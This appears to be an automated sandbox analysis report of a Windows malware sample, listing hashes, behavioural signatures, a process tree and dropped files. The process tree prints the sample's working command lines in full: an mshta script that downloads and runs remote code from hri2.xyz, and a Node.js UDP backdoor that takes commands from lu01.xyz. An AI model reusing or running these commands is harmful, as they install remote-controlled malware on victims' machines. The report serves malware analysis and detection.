Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
09-06-2021 09:55
Static task
static1
Behavioral task
behavioral1
Sample
euthree_20210608-233519.exe
Resource
win7v20210410
General
-
Target
euthree_20210608-233519.exe
-
Size
2KB
-
MD5
cd17d11bb2c8dd9942e816677df2dae2
-
SHA1
140fbc4ec7fd4be8c66dd38d6836473726fa7c1b
-
SHA256
5a2264e42206d968cbcfff583853a0e0d4250f078a5e59b77b8def16a6902e3f
-
SHA512
31180403ffbe4a2c2144bab8a93aed6d64c85a2c6658b44e8ee7cf8bc1a0e530de4141c0e685826f79457e396bb3d70a25c87ce30a142b481fc9bde0b93c6762
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.execscript.exeflow pid process 3 2024 mshta.exe 4 1344 cscript.exe -
Executes dropped EXE 1 IoCs
Processes:
node.exepid process 1016 node.exe -
Loads dropped DLL 1 IoCs
Processes:
cscript.exepid process 1480 cscript.exe -
Drops file in Windows directory 2 IoCs
Processes:
expand.exedescription ioc process File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
euthree_20210608-233519.exemshta.execmd.execscript.exedescription pid process target process PID 1040 wrote to memory of 2024 1040 euthree_20210608-233519.exe mshta.exe PID 1040 wrote to memory of 2024 1040 euthree_20210608-233519.exe mshta.exe PID 1040 wrote to memory of 2024 1040 euthree_20210608-233519.exe mshta.exe PID 1040 wrote to memory of 2024 1040 euthree_20210608-233519.exe mshta.exe PID 2024 wrote to memory of 1984 2024 mshta.exe cmd.exe PID 2024 wrote to memory of 1984 2024 mshta.exe cmd.exe PID 2024 wrote to memory of 1984 2024 mshta.exe cmd.exe PID 2024 wrote to memory of 1984 2024 mshta.exe cmd.exe PID 1984 wrote to memory of 1344 1984 cmd.exe cscript.exe PID 1984 wrote to memory of 1344 1984 cmd.exe cscript.exe PID 1984 wrote to memory of 1344 1984 cmd.exe cscript.exe PID 1984 wrote to memory of 1344 1984 cmd.exe cscript.exe PID 1984 wrote to memory of 700 1984 cmd.exe expand.exe PID 1984 wrote to memory of 700 1984 cmd.exe expand.exe PID 1984 wrote to memory of 700 1984 cmd.exe expand.exe PID 1984 wrote to memory of 700 1984 cmd.exe expand.exe PID 1984 wrote to memory of 1480 1984 cmd.exe cscript.exe PID 1984 wrote to memory of 1480 1984 cmd.exe cscript.exe PID 1984 wrote to memory of 1480 1984 cmd.exe cscript.exe PID 1984 wrote to memory of 1480 1984 cmd.exe cscript.exe PID 1480 wrote to memory of 1016 1480 cscript.exe node.exe PID 1480 wrote to memory of 1016 1480 cscript.exe node.exe PID 1480 wrote to memory of 1016 1480 cscript.exe node.exe PID 1480 wrote to memory of 1016 1480 cscript.exe node.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\euthree_20210608-233519.exe"C:\Users\Admin\AppData\Local\Temp\euthree_20210608-233519.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta "javascript:document.write();195;y=unescape('%339%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F%32f%652%652%62%7E%326').split('~');150;try{x='WinHttp';35;x=new ActiveXObject(x+'.'+x+'Request.5.1');125;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);82;x.send();165;y='ipt.S';201;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);68;}catch(e){};129;;window.close();"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1623232550443.txt & cscript /nologo /e:jscript get1623232550443.txt "http%3A%2F%2Fhri2.xyz%2Fhri%2F%3F26ece80b3%26b%3Da30f6953" node.cab & expand node.cab node.exe & del get1623232550443.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1623232550443.txt & cscript /nologo /e:jscript get1623232550443.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%276ece80b3%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1623232550443.txt3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1623232550443.txt "http%3A%2F%2Fhri2.xyz%2Fhri%2F%3F26ece80b3%26b%3Da30f6953" node.cab4⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\expand.exeexpand node.cab node.exe4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1623232550443.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%276ece80b3%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\DNTException\node.exe"C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%276ece80b3%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))5⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\DNTException\get1623232550443.txtMD5
52ec5ebd8a447b5115ce83e703bcde51
SHA138ce97f87c6be668d07985558fc89c53e27770a3
SHA256ef1be6a77e480e683331052654d3db47a02fe4b7af3e35e67b9248e989307615
SHA5129af71d426564ef92ff6de1d89107161c138bbdd9dc08b5e380a0b94e7b2e91ec4d498a1d8f4514552a45bf14a8f9078dc295aa1cb86cfc063427ad218e9d5f32
-
C:\ProgramData\DNTException\get1623232550443.txtMD5
e15f82747d0884d61a5bc4fb2db7d29d
SHA1aca478622586f17603fe56705fd319b75198b2b0
SHA256982675d0465497986b3ece89f08f81a4629d975617671153e0ca653f2589966f
SHA512d8c17e54cbefa72191c238f23d619a4637fd74c8c8b9975071bf5507c5a34259495cd20e516c7f7f0c215ec4f724b22de88b8a5ea43765c019eb067600cf661d
-
C:\ProgramData\DNTException\node.cabMD5
c7ed3d9304a29c8b472174bd910be071
SHA122b7d55b80acd434c13b0a2d8c59b45c10220a42
SHA256abbaffb1b56bd3c5db5aedf4bdc0794d82bedba43677d13cd1056cb5412b3441
SHA512c65c80564019ae54145a939f9ed463895c337f020cbd769647dc6baf8db5db283a5e151c2ae4f10681d23db161d791ce59c395d8ebba603a27a2a6be0368a1a2
-
C:\ProgramData\DNTException\node.exeMD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
C:\ProgramData\DNTException\node.exeMD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
\ProgramData\DNTException\node.exeMD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
memory/700-64-0x0000000000000000-mapping.dmp
-
memory/1016-77-0x0000000007C00000-0x0000000007C01000-memory.dmpFilesize
4KB
-
memory/1016-71-0x0000000000000000-mapping.dmp
-
memory/1016-78-0x0000000035600000-0x0000000035601000-memory.dmpFilesize
4KB
-
memory/1016-76-0x000000000D500000-0x000000000D501000-memory.dmpFilesize
4KB
-
memory/1016-75-0x000000000D200000-0x000000000D201000-memory.dmpFilesize
4KB
-
memory/1016-74-0x000000000DB00000-0x000000000DB01000-memory.dmpFilesize
4KB
-
memory/1016-73-0x000000002D300000-0x000000002D301000-memory.dmpFilesize
4KB
-
memory/1344-61-0x0000000000000000-mapping.dmp
-
memory/1344-63-0x0000000074F31000-0x0000000074F33000-memory.dmpFilesize
8KB
-
memory/1480-66-0x0000000000000000-mapping.dmp
-
memory/1984-60-0x0000000000000000-mapping.dmp
-
memory/2024-59-0x0000000000000000-mapping.dmp